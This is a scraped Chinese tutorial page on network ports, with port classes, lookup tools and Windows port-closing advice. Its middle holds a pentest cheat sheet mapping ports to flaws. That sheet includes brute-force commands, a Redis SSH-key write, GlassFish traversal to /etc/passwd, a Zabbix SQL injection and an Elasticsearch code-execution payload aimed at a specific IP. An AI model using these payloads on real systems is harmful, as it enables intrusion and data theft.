当前位置: 首页 > news >正文

全网营销网站怎么做源码制作网站

全网营销网站怎么做,源码制作网站,网址大全123手机版下载,简述网站技术解决方案一、摘要 计算机 端口 是英文 port #xff0c;可以认为是计算机与外界通讯交流的出口。 其中硬件领域的 端口 又称 接口#xff0c;如#xff1a;USB端口、串行端口等。软件领域的 端口 一般指网络中面向连接服务和无连接服务的通信协议端口#xff0c;是一种… 一、摘要 计算机 端口 是英文 port 可以认为是计算机与外界通讯交流的出口。 其中硬件领域的 端口 又称 接口如USB端口、串行端口等。软件领域的 端口 一般指网络中面向连接服务和无连接服务的通信协议端口是一种抽象的软件结构包括一些 数据结构 和 I/O基本输入输出缓冲区。 面向连接 和 无连接 协议ConnectionOriented and Connectionless Protocols      面向连接服务的主要特点有面向连接服务要经过三个阶段数据传数前先建立连接连接建立后再传输数据数据传送完后释放连接。面向连接服务可确保数据传送的次序和传输的可靠性。 无连接服务的特点是无连接服务只有传输数据阶段。消除了除数据通信外的其它开销。只要发送实体是活跃的无须接收实体也是活跃的。它的优点是灵活方便、迅速特别适合于传送少量零星的报文但无连接服务不能防止报文的丢失、重复或失序。 区分 面向连接服务 和 无连接服务 的概念很简单形象的例子是打电话和写信。 面向连接就相当于打电话两个人如果要通电话必须先建立连接(即拨号)等待应答后才能相互传递信息最后还要释放连接(即挂电话)。无连接服务就相当于写信写信就没有那么复杂了地址姓名填好以后直接往邮筒一扔收信人就能收到。二、什么是端口 在 Internet 上各主机间通过 TCP/TP 协议 发送和接收 数据报各个数据报 根据其 目的主机的 IP 地址 来进行互联网络中的路由选择但是现在操作系统都支持 多程序(进程) 同时运行那么目的主机应该把接收到的数据报传送给这些同时运行的进程中的哪一个呢显然这个问题有待解决端口机制便由此被引入进来。 本地操作系统会给那些有需求的进程分配协议端口 protocal port即我们常说的端口 每个协议端口由一个正整数标识如80139445等等。当目的主机接收到数据报后将根据报文首部的目的端口号把数据发送到相应端口而与此端口相对应的那个进程将会领取数据并等待下一组数据的到来。 端口 的 形象理解 可以将计算机想象成一幢大楼有许多门通向不同的办公室。每个办公室里都有一个职员在做一项工作。门牌号80后面的办公室就负责处理web请求。也有可能web部门搬进了另外一个办公室例如8080办公室继续做相同的工作处理web请求)。另外一个部门搬进了80办公室它们并不处理web请求或者80办公室关闭了或停止使用了。那么试图访问80办公室获得web页面的访客就需要知道该部门已经搬到8080办公室不再使用80办公室。如果一个访客在该部门搬走后还试图访问80端口获得和web有关的信息他不会得到任何有用的信息因为80办公室更换了部门或者办公室已停用。只有知道正确的办公室地址的人才能从8080端口获得网页内容。 计算机   相当于  大楼端口  相当于 门牌号对应的门应用程序  相当于  办公室程序的功能就是办公室里面职员做的工作。 应用程序调入内存运行后一般称为进程通过系统调用与某端口建立连接binding绑定后传输层传给该端口的数据都被相应的进程所接收相应进程发给传输层的数据都从该端口输出。在 TCP/IP 协议的实现中端口操作类似于一般的 I/O 操作进程获取一个端口相当于获取本地唯一的I/O文件可以用一般的读写方式访问。  Linux 中类似于文件描述符每个端口都拥有一个叫做端口号的整数描述符用来区别不同的端口。 由于 TCP/IP 传输层的 TCP 和 UDP 两个协议是两个完全独立的软件模块因此各自的端口号也相互独立。 如 TCP有一个 255 号端口UDP 也可以有一个 255 号端口两者并不冲突。  三、端口的分类 端口是设备与外界通讯交流的出口。端口是通过 端口号 来标记的端口号只有整数范围是从0 到 65535  在 Internet 上按照协议类型分类端口 被分为 TCP端口 和 UDP端口 两类虽然他们都用正整数标识但这并不会引起歧义。 比如TCP的80端口 和 UDP的80端口因为数据报在标明端口的同时还将标明端口的类型所以不会发生冲突。 端口号有两种基本分配方式 全局分配这是一种集中分配方式由一个公认权威的中央机构根据用户需要进行统一分配并将结果公布于众本地分配又称 动态连接即进程需要访问传输层服务时向本地操作系统提出申请操作系统返回本地唯一的端口号进程再通过合适的系统调用将自己和该端口连接起来binding绑定。 TCP/IP 端口号的分配综合了以上两种方式将端口号分为两部分 少量的作为保留端口以全局方式分配给服务进程。每一个标准服务器都拥有一个全局公认的端口叫周知口即使在不同的机器上其端口号也相同。剩余的为自由端口以本地方式进行分配。TCP和UDP规定小于256的端口才能作为保留端口。 从端口的分配来看端口被分为 固定端口 和 动态端口 两大类 一些教程还将极少被用到的高端口划分为第三类私有端口 固定端口01023使用集中式管理机制即服从一个管理机构对端口的指派这个机构负责发布这些指派。通常这些端口的通讯明确表明了某种服务的协议。例如80端口实际上总是HTTP通讯。  所以可以扫描这些端口来判断对方是否开启了这些服务如TCP的21ftp80http139netbiosUDP的7echo69tftp等等一些大家熟 知的端口。动态端口102449151这些端口并不被固定捆绑某一服务操作系统将这些端口动态的分配给各个进程 同一进程两次分配有可能分配到不同的端口。不过一些应用程序并不愿意使用操作系统分配的动态端口他们有其自己的 商标性 端口比如oicq 客户端的 4000 端口木马冰河的7626端口等都是固定而出名的。私有端口Dynamic and/or Private Ports从 49152 到 65535。理论上不应为服务分配这些端口。实际上机器通常从1024起分配动态端口。但也有例外SUN的RPC端口从32768开始。 端口分类 公认端口 (Well Known Ports)0-1023他们紧密绑定了一些服务注册端口 (Registered Ports)1024-49151他们松散的绑定了一些服务动态 / 私有49152-65535不为服务分配这些端口系统管理员可以 重定向 端口  把一个端口重定向到另一个端口。例如默认的 HTTP 端口是 80可以重定向到 8080。访问 http://www.127.0.0.1:8080/ 就是访问 http://www.127.0.0.1:80/  实现重定向是为了隐藏公认的默认端口降低受破坏率。 如果要对一个公认的默认端口进行攻击则必须先进行端口扫描。大多数端口重定向与原端口有相似之处例如多数 HTTP端口由80变化而来8188800080808888。同样 POP 的端口原来在110也常被重定向到 1100。也有不少情况是选取统计上有特别意义的数象12342345634567等。许多人有其它原因选择奇怪的数426966631337。近来越来越多的远程控制木马( Remote Access Trojans, RATs )采用相同的默认端口。如NetBus的默认端口是12345。Blake R. Swopes 指出使用重定向端口还有一个原因在 UNIX 系统上如果你想侦听 1024 以下的端口需要有 root 权限。如果你没有 root 权限而又想开 web 服务你就需要将其安装在较高的端口。此外一些 ISP 的防火墙将阻挡低端口的通讯这样的话即使你拥有整个机器你还是得重定向端口。四、端口在入侵中的作用 如果把 服务器 比作 房子那么 端口 可以看作是通向不同房间服务的 门如果不考虑细节的话这是一个不错的比喻。 入侵者要占领这间房子势必要破门而入物理入侵另说那么对于入侵者来说了解房子开了几扇门都是什么样的门门后面有什么东西就显得至关重要。    入侵者通常会用 扫描器 对目标主机的 端口 进行扫描以确定哪些端口是开放的从开放的端口入侵者可以知道目标主机大致提供了哪些服务进而猜测可能存在的漏洞。 因此对端口的扫描可以帮助我们更好的了解目标主机而对于管理员扫描本机的开放端口也是做好安全防范的第一步。 五、端口的相关工具 netstat -an  查看自己所开放端口的最方便方法在 cmd 中输入这个命令就可以了。如下 C:/netstat -anActive ConnectionsProto Local Address     Foreign Address    StateTCP  0.0.0.0:135      0.0.0.0:0       LISTENINGTCP  0.0.0.0:445      0.0.0.0:0       LISTENINGTCP  0.0.0.0:1025       0.0.0.0:0       LISTENINGTCP  0.0.0.0:1026       0.0.0.0:0       LISTENINGTCP  0.0.0.0:1028       0.0.0.0:0       LISTENINGTCP  0.0.0.0:3372       0.0.0.0:0       LISTENINGUDP  0.0.0.0:135      *:*UDP  0.0.0.0:445      *:*UDP  0.0.0.0:1027       *:*UDP  127.0.0.1:1029     *:*UDP  127.0.0.1:1030     *:*这是我没上网的时候机器所开的端口两个135和445是固定端口其余几个都是动态端口。 fport.exe 和 mport.exe  fport mport pskill_csdnww1130的博客-CSDN博客 这也是两个命令行下查看本地机器开放端口的小程序其实与 netstat -an 这个命令大同小异只不过它能够显示打开端口的进程信息更多一些而已如果你怀疑自己的奇怪端口可能是木马那就用他们查查吧。 activeport.exe也称aports.exe 还是用来查看本地机器开放端口的东东除了具有上面两个程序的全部功能外他还有两个更吸引人之处图形界面以及可以关闭端口。这对菜鸟来说是个绝对好用的东西推荐使用喔。 superscan 纯端口扫描类软件中的 NO.1速度快而且可以指定扫描的端口不多说了绝对必备工具。 六、保护好自己的端口 刚接触网络的朋友一般都对自己的端口很敏感总怕自己的电脑开放了过多端口更怕其中就有后门程序的端口但由于对端口不是很熟悉所以也没有解决办法上起网来提心吊胆。其实保护自己的端口并不是那么难只要做好下面几点就行了 1) 查看经常用命令或软件查看本地所开放的端口看是否有可疑端口2) 判断如果开放端口中有你不熟悉的应该马上查找端口大全或木马常见端口等资料网上多的很看看里面对你那个可疑端口的作用描述或者通过软件查看开启此端口的进程来进行判断3) 关闭如果真是木马端口或者资料中没有这个端口的描述那么应该关闭此端口你可以用防火墙来屏蔽此端口也可以用本地连接TCP/IP高级选项TCP/IP筛选启用筛选机制来筛选端口注意判断时候要慎重因为一些动态分配的端口也容易引起你多余的怀疑这类端口一般比较低且连续。还有一些狡猾的后门软件他们会借用 80 等一些常见端口来进行通信穿透了防火墙令人防不胜防因此不轻易运行陌生程序才是关键。 七、端口 漏洞 关键字端口 漏洞 常见端口及其漏洞https://www.jianshu.com/p/d476e2a1af7e 端口渗透过程中我们需要关注几个问题: 1、 端口的banner信息2、 端口上运行的服务3、 常见应用的默认端口 端口号端口说明相关漏洞21FTP文件传输协议允许匿名的上传、下载、爆破和嗅探操作22SSH远程连接爆破、SSH隧道及内网代理转发、文件传输23Telnet远程连接爆破、嗅探、弱口令25SMTP邮件服务邮件伪造53DNS域名服务器允许区域传送、DNS劫持、缓存投毒、欺骗、CVE-2020-135067、68DHCP服务劫持、欺骗69小型文件传输协议允许匿名的上传、下载、爆破和嗅探操作80 --- 90常见web服务端口web攻击、爆破、对应服务器版本漏洞110POP3协议嗅探、爆破139SAMBA服务爆破、未授权访问、远程代码执行143IMAP协议爆破161SNMP协议爆破、搜集目标内网信息389LDAP目录访问协议注入、允许匿名访问、弱口令443常见web端口web攻击、爆破、对应服务器版本漏洞445Microsoft-DS为共享开放代码执行、ms06-040、0796等512 / 513 / 514Linux rexec服务爆破、远程登录873rsync服务匿名访问、文件上传1025RPCNFS 匿名访问1099javarmi远程命令执行漏洞1352Lotus Domino邮件服务弱口令、信息泄露、爆破1433MSSQL数据库注入、提权、SA弱口令、爆破1521Oracle数据库TNS爆破、注入、反弹shell2049NFS服务配置不当2181ZooKeeper服务未授权访问3306Mysql数据库注入、提权、爆破3389RDP远程端口连接shift后门、爆破、ms12-020、CVE-2019-07083690SVN服务SVN泄露、未授权访问4848GlassFish控制台弱口令5000Sysbase/DB2数据库爆破、注入5432PostgreSQL数据库爆破、注入、弱口令5632PcAnywhere服务抓取密码、代码执行5900 / 5901 / 5902VNC弱口令爆破5984CouchDB未授权访问6379Redis数据库可尝试为授权访问、弱口令爆破7001 / 7002WebLogic控制台反序列化、控制台弱口令8009Tomcat AJP协议Tomcat AJP协议漏洞8069Zabbix服务远程执行、SQL注入8080、8089JBoss/Resin/Jetty/Jenkins/tomcat反序列化、控制台弱口令8888jupyter notebook未授权访问9090WebSphere控制台Java反序列化、弱口令9200、9300Elasticsearch服务远程执行10000webmin控制面板弱口令11211Memcached服务未授权访问27017/27018MongoDB数据库爆破、未授权访问50000SAP Management Console远程执行50050CS弱口令端口    服与漏洞 21/69    ftp/tftp文件传输协议漏洞1.爆破2.嗅探溢出3.后门4.匿名访问 22    ssh漏洞爆破openssh漏洞 23    telnet远程连接漏洞:爆破嗅探 25    smtp邮件服务漏洞弱口令未授权访问邮件伪造 53    dns域名系统漏洞dns区域传输劫持缓存投毒隧道技术刺透防火墙 80/8080    apache/tomcat/nginx/axis2,漏洞爆破弱口令http慢速攻击可以把服务器打死解析漏洞 80/443/8080    web,漏洞常见web攻击控制台爆破对应服务器版本漏洞 80/81/443    IIS漏洞put写文件短文件名漏洞解析漏洞 110    pop3漏洞弱口令 123    ntp漏洞ntp放大攻击 137/139    samba漏洞爆破未授权访问远程代码执行 143    imap漏洞弱口令 1521    oracle漏洞爆破注入攻击 161    snmp漏洞爆破 389    ladp漏洞注入攻击未授权访问爆破 443    https漏洞心脏滴血 445    smb漏洞溢出漏洞 512    linux r漏洞rlogin远程登录 873    rsync漏洞未授权访问 1080    socket漏洞爆破:进行内网渗透 1098    javarmi漏洞命令执行 1352    lotus漏洞爆破信息泄露跨站脚本攻击 1433    mssql漏洞爆破注入攻击 2049    nfs漏洞未授权访问 2181    zookeeper漏洞未授权访问 2222    da漏洞da虚拟主机 2601    zebra漏洞默认密码 3128    squid漏洞空口令 3306    mysql漏洞爆破拒绝服务注入 3389    rdp/windows远程连接漏洞爆破shift后门3389漏洞攻击 4100    sysbase漏洞弱口令 4440    rundeck漏洞弱口令 4848    glassfish漏洞爆破认证绕过 5000    sybase/db2漏洞弱口令命令注入 5422    postgresql漏洞弱口令 5432    postgresql漏洞缓冲区溢出注入攻击爆破 5632    pcanywhere漏洞拒绝服务代码执行 5900    vnc漏洞爆破,认证口令绕过拒绝服务攻击权限提升 5984    couchdb漏洞命令执行 6082    varnish漏洞未授权访问 6379    redis漏洞弱口令未授权访问 7001    weblofic漏洞爆破弱口令(system/system,weblogic/weblogic),congsole后台部署webshelljava反序列化泄漏源代码/列目录ssrf窥探内网命令执行 8000    jdwp漏洞命令执行 8069    zabbix漏洞命令执行 8080    apache/tomcat/nginx/axis2/jboss中间件漏洞弱口令命令执行 8080    jboss其他端口1098/1099/4444/4445/8080/8009/8083/8093漏洞爆破远程代码执行java反序列化 8080    glassfish其他端口iiop3700控制台4848漏洞爆破任意文件读取认证绕过 8080    resin漏洞目录遍历远程代码执行 8080/8089    jenkis漏洞爆破未授权访问反序列化 8080    jetty漏洞远程共享缓冲区溢出 8161    activemq漏洞文件上传 8649    ganglia漏洞未授权访问信息泄露 8980    opennms漏洞反序列化漏洞 9080    websphere漏洞弱口令反序列化文件泄露 9090    websphere漏洞控制台爆破反序列化java 9200/9300    elasticsearch漏洞远程代码执行未授权访问 11211    memcache漏洞未授权访问 11211    memcacache漏洞未授权访问 27017    mongodb漏洞未授权访问 27017    mongodb漏洞爆破未授权 27018    mongodb漏洞未授权 50000    sap漏洞命令执行 50010    hadoop漏洞信息泄露命令执行 50030    hadoop漏洞未授权访问 50070    hadoop漏洞未授权访问 512/513/514    linux r漏洞直接使用rlogin 67/68    dhcp漏洞劫持欺骗 常见漏洞类型 21.FTP (21) 测试内容 爆破工具hydra,msf… 匿名访问用户名anonymous  密码为空 弱口令:字典 22.SSH (22) SSH 为 Secure Shell 的缩写由 IETF 的网络小组Network Working Group所制定SSH 为建立在应用层基础上的安全协议 测试内容 暴力破解弱口令 相关工具:hydramsf等 23.Telnet (23) 测试内容 嗅探此种情况一般发生在局域网 暴力破解帐号密码弱口令空口令 25.SMTP (25) 测试内容 邮件欺骗转发垃圾邮件 针对不同版本的邮件服务器外部公开的漏洞可以在各大漏洞数据库查询。 Snmp默认团体名 相关工具 使用namp脚本nmap -Pn -sS -p25 --script smtp* -v 53.DNS53 默认端口53 攻击方式 dns域传输漏洞 dns.py 110.POP3110 默认端口109POP2、110POP3、995POP3S 攻击方式 爆破弱口令;邮箱泄露Github敏感信息泄漏 可利用一些邮箱爆破脚本 389.LDAP389 ldap轻量级目录访问协议最近几年随着ldap的广泛使用被发现的漏洞也越来越多。但是毕竟主流的攻击方式仍旧是那些比如注入未授权等等这些问题的出现也都是因为配置不当而造成的。 默认端口389 攻击方式 注入攻击盲注; 爆破弱口令 未授权访问如ldap://1.1.1.1:389 80.HTTP/HTTPS (80,443) 超文本传输协议HTTPHyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。Web应用程序安全测试可以参照:web应用测试案例 443端口作为默认https服务端口较常见的漏洞危害大的就是心脏出血。 445.SMB (445) SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。 测试内容 网络公开的针对smb协议的漏洞利用,例如ms08-067,ms17-010 相关工具 msfauxiliary/scanner/smb/smb_version nmap脚本smb-check-vulns  873.Rsync873 Rsync类UNIX系统下的数据备份工具remote syncRsync默认允许匿名访问如果在配置文件中没有相关的用户认证以及文件授权就会触发隐患。 默认端口873 攻击方式 未授权访问 nmap 0.0.0.0/24 -p873 --open rootkali: rsync 127.0.0.1:: 1090.RMI (1090) 默认端口1090、1099、9090 攻击方式 远程命令执行java反序列化dubbo java 反序列 dubbo java 反序列 1433.MSSQL(1433) MSSQL是指微软的SQLServer数据库服务器它是一个数据库平台。 测试内容 暴力破解 工具hydra 1521.Oracle (1521) Oracle是甲骨文公司的一款关系数据库管理系统。 测试内容 暴力破解 枚举数据库信息 测试工具msf等 2181.Zookeeper2181 zookeeper分布式的开放源码的分布式应用程序协调服务。 默认端口2181 未授权访问 rootkali:~# echo envi |nc 0.0.0.0 2181 2375.Docker(2375) 默认端口2375 未授权访问 Ip:2375/version 3306.MYSQL (3306) MySQL是一个关系型数据库管理系统。 测试内容 暴力破解 爆破工具hydra,python, hydra.exe -L c:user.txt -P c:pass.txt ip mysql 3389.RDP (3389) 远程桌面协议RDP远程桌面登陆服务,默认Windows 3389端口。 测试内容 爆破用户密码 根据网络公开的漏洞exp进行测试如ms12-020,cve-2019-0708 相关工具:hydra,msf hydra 192.168.1.12 rdp -L users.txt -P pass.txt -V  ms12-020 cve-2019-0708 4848.GlassFish4848 默认端口 4848 攻击方式 爆破, 认证绕过,弱口令admin:admin 任意文件读取/etc/passwd https://ip:4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 5432.PostgreSQL5432 PostgreSQL是一种特性非常齐全的自由软件的对象–关系型数据库管理系统。 默认端口5432 攻击方式 爆破弱口令postgres postgres 弱口令可以用PostgreSQL数据库工具登录. 缓冲区溢出CVE-2014-2669 工具命令medusa -H /tmp/ip.txt -u postgres -n 5432 -P /tmp/pass.txt -e ns -M postgres -T 255 -f -O /tmp/good.txt -r 0 5601.Kibana(5601) 默认端口5601 Ip:5601/app/kibana 5900.VNC5900 VNC一款优秀的远控工具。 默认端口5900桌面ID59015902 攻击方式 爆破,弱口令,认证口令绕过。 vnc -i IP1.255.255.255 -p 5900 –vnc 也可以用VNC连接工具进行连接 6379Redis6379 默认端口6379 攻击方式 爆破弱口令 未授权访问配合ssh key提权; 工具:https://github.com/caoxinyu/RedisClientGitHub - uglide/RedisDesktopManager: Cross-platform Developer GUI for Redis 在上图的命令行下可利用Redis 写入webshell前提条件是开了web并且知道路径才成功。 #ssh-keygen –t rsa #(echo -e ; cat id_rsa.pu; echo -e ) test.txt #cat test.txt | redis-cli -h xx.xx.xx.xx -x set aa redis-cli -h 0.0.0.0 0.0.0.0:6379 config set dir /root/.ssh/ OK 0.0.0.0:6379 config set dbfilename “test” OK 0.0.0.0:6379 save OK 7001.WebLogic7001 默认端口7001 攻击方式Java反序列化,WEBLOGIC SSRF,WEBLOGIC CVE-2014-4210,CVE-2016-0638 ,CVE-2016-3510 ,CVE-2017-3248,CVE-2018-2628 ,CVE-2018-2893,CVE-2019-2725,CVE-2019-2729 ,CVE-2018-2894,CVE-2017-3506,CVE-2017-10271 爆破弱口令 4组用户名密码均一致system weblogic密码可能weblogic123 portaladmin guest Java反序列化 WebLogic 反序列化漏洞补丁绕过(CVE-2017-3248) Weblogic SSRF: ip:7001/uddiexplorer/SearchPublicRegistries.jsp?operatorhttp://ip:portrdoSearchnametxtSearchnamesdftxtSearchkeytxtSearchforselforBusinesslocationbtnSubmitSearch 8080.Resin8080 默认端口8080 攻击方式 弱口令 admin/admin /resin-admin/status.php 目录遍历 ip/E:%5C/ ip/ /web-inf/   文件读取 /resin-doc/examples/security-basic/viewfile?fileWEB-INF/web.xml Ssrf:/resin-doc/resource/tutorial/jndi-appconfig/test?inputFilehttp://10.29.5.24 8069.Zabbix8069 zabbix基于Web界面的提供分布式系统监视。监视各种网络参数保证服务器系统的安全运营。 默认端口8069 攻击方式 弱口令admin/zabbix ip/zabbix 注入 /zabbix/httpmon.php?applications2 and (select 1 from (select count(),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)2))x from information_schema.tables group by x)a) zabbix后台是可以直接执行shell命令的。可反弹shell。   8080.Tomcat8080 默认端口80/8080 攻击方式 爆破弱口令爆破manager/html后台admin/admin tomcat/tomcat admin/null HTTP慢速攻击可以把服务器打死对一些大型的网站有影响 Tomcat官方安全公告漏洞如CVE-2017-12615 8080.Jboss8080 默认端口8080 攻击方式 爆破弱口令爆破jboss系统后台/admin-console 远程代码执行配置不当/jmx-consoel /web-console /invoker/JMXInvokerServlet,无密码认证或认证绕过。 Java反序列化 8080.Jenkins8080 默认端口8080、8089 攻击方式 爆破弱口令默认管理员admin/admin… 未授权访问 ip/script 可直接进入无需密码执行命令 反序列化漏洞网上公开 9090.Websphere9090 默认端口9090第一个应用就是9080第二个就是9081控制台9090 攻击方式 爆破弱口令控制台admin/admin… /ibm/console/ 任意文件泄漏CVE-2014-0823 Java反序列化 9200.Elasticsearch9200 默认端口9200、9300 攻击方式 未授权访问 ip:9200/_plugin/head/ ip:9200/_search?Preety ip:9200/_cat 远程命令执行 命令 查看状态http:// ip:9200/_status 
集群健康报告http:// ip:9200/_cluster/health 
集群节点信息http:// ip:9200/_nodes
http:// ip:9200/_search?pretty
插入数据: 
curl -XPOST http:// ip:9200/test/test/1 -d 
{content:中国好礼物可惜是xo} 
当然也可以先创建索引: 
curl -XPUT http://ip:9200/test-test 
查询插入的数据 
curlhttp://ip:9200/test/test/_search?pretty 
删除索引 
curl -XDELETE http://ip:9200/test Elasticsearch Groovy 脚本动态执行漏洞; POST数据提交 211.151.7.139:9200/_search?pretty {size:1,script_fields:{test#: {script:java.lang.Math.class.forName(java.io.BufferedReader).getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(java.io.InputStreamReader).getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(java.lang.Runtime).getRuntime().exec(cat/etc/hosts).getInputStream())).readLines(),lang: groovy}}} 11211.memcache11211 默认端口11211 未授权访问 nc -vv 127.0.0.1 11211 stats items stats cachedump 11 11 get admin_user_admin 27017.MongoDB27017 MongoDBNoSQL数据库。 默认端口27017 攻击方式 爆破弱口令 未授权访问 工具: https://robomongo.org/download 127.0.0.1:27017 限制端口防非法入侵 一般来说我们采用一些功能强大的反黑软件和防火墙来保证我们的系统安全本文拟用一种简易的办法——通过限制端口来帮助大家防止非法入侵。 非法入侵的方式 简单说来非法入侵的方式可粗略分为4种 1、扫描端口通过已知的系统Bug攻入主机。2、种植木马利用木马开辟的后门进入主机。3、采用数据溢出的手段迫使主机提供后门进入主机。4、利用某些软件设计的漏洞直接或间接控制主机。 非法入侵的主要方式是前两种尤其是利用一些流行的黑客工具通过第一种方式攻击主机的情况最多、也最普遍而对后两种方式来说只有一些手段高超的黑客才利用波及面并不广泛而且只要这两种问题一出现软件服务商很快就会提供补丁及时修复系统。 因此如果能限制前两种非法入侵方式就能有效防止利用黑客工具的非法入侵。而且前两种非法入侵方式有一个共同点就是通过端口进入主机。 端口就像一所房子服务器的几个门一样不同的门通向不同的房间服务器提供的不同服务。我们常用的FTP默认端口为21而WWW网页一般默认端 口是80。但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务比如139等还有一些木马程序比如冰河、BO、广外等都是自动开辟一个您不察 觉的端口。那么只要我们把自己用不到的端口全部封锁起来不就杜绝了这两种非法入侵吗 限制端口的方法 对于个人用户来说您可以限制所有的端口因为您根本不必让您的机器对外提供任何服务而对于对外提供网络服务的服务器我们需把必须利用的端口比如WWW端口80、FTP端口21、邮件服务端口25、110等开放其他的端口则全部关闭。  这里对于采用Windows 2000或者Windows XP的用户来说不需要安装任何其他软件可以利用“TCP/IP筛选”功能限制服务器的端口。具体设置如下  1、右键点击“网上邻居”选择“属性”然后双击“本地连接”如果是拨号上网用户选择“我的连接”图标弹出“本地连接状态”对话框。  2、点击[属性]按钮弹出“本地连接 属性”选择“此连接使用下列项目”中的“Internet协议TCP/IP”然后点击[属性]按钮。  3、在弹出的“Internet协议TCP/IP”对话框中点击[高级]按钮。在弹出的“高级TCP/IP 设置”中选择“选项”标签选中“TCP/IP筛选”然后点击[属性]按钮。  4、在弹出的“TCP/IP筛选”对话框里选择“启用TCP/IP筛选”的复选框然后把左边“TCP端口”上的“只允许”选上。每一项服务都对应相应的端口比如众如周知的WWW服务的端口是80smtp是25ftp是21win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要关掉端口也就是关闭无用的服务。 “控制面板”的“管理工具”中的“服务”中来配置。1、关闭7.9等等端口关闭Simple TCP/IP Service,支持以下TCP/IP服务Character Generator,Daytime, Discard, Echo, 以及 Quote of the Day。2、关闭80口关掉WWW服务。在“服务”中显示名称为World Wide Web Publishing Service通过 Internet 信息服务的管理单元提供 Web 连接和管理。3、关掉25端口关闭Simple Mail Transport Protocol (SMTP)服务它提供的功能是跨网传送电子邮件。4、关掉21端口关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。5、关掉23端口关闭Telnet服务它允许远程用户登录到系统并且使用命令行运行控制台程序。6、还有一个很重要的就是关闭server服务此服务提供RPC支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享比如ipc$、c$、admin$等等此服务关闭不影响您的其他操作。7、还有一个就是139端口139端口是NetBIOS Session端口用来文件和打印共享注意的是运行samba的unix机器也开放了139端口功能一样。以前流光2000用来判断对方主机类型不太准确估计就是139端口开放既认为是NT机现在好了。关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”打勾就关闭了139端口。对于个人用户来说可以在各项服务属性设置中设为“禁用”以免下次重启服务也重新启动端口也开放了。
http://www.pierceye.com/news/106756/

相关文章:

  • 天津网站建设定制软件开发服务公司
  • 做企业网站cms减肥网站源码
  • 建设工程检测预约网站猎头公司怎么找
  • 北京网站手机站建设公司手机网站开发常用工具
  • 太原做网站联系方式论坛的网站开发项目
  • drupal 做的网站网站设计与网站制作
  • 我要表白网站在线制作wordpress朗读句子插件
  • 黑龙江建设网官方怎么提高seo关键词排名
  • 拍卖网站开发多少钱十堰秦楚网招聘公告
  • 区域城市分站网站怎么做慈溪网站开发
  • 广州天河网站制作互联网十创业项目
  • 百度是不是只有在自己的网站发布才会被收录完备的常州网站优化
  • 响应式网站开发需要的条件百度信息流广告推广
  • 英文网站建设推广joomla drupal wordpress
  • 什么网站做简历免费下载怎么申请专线访问国际网络
  • 南三环做网站的公司网站开发开题报告计划进度安排
  • 我想建一个网站怎么建微信 网站提成方案点做
  • 苏中建设集团官方网站网络推广文章的方法
  • 月嫂云商城网站建设切换国外ip的软件
  • 沧州网站建设 凯航怎么样建立一个网站
  • 百度网站地图模板在猪八戒上做网站要注意什么
  • 做美工需要哪些网站重庆交通建设集团网站
  • 网站手机端排名怎么做用笔记本做网站
  • 食药监局网站建设方案南京企业自助建站
  • 竹山县住房和城乡建设局网站红豆网桂林论坛
  • 浙江省建设网站专题网站建设的请示
  • php网站好吗红旗渠建设集团网站
  • 网站建设如何不被忽悠做营销怎样才能吸引客户
  • 代写文章兼职济南公交优化
  • 商城开发网站建立公司网站步骤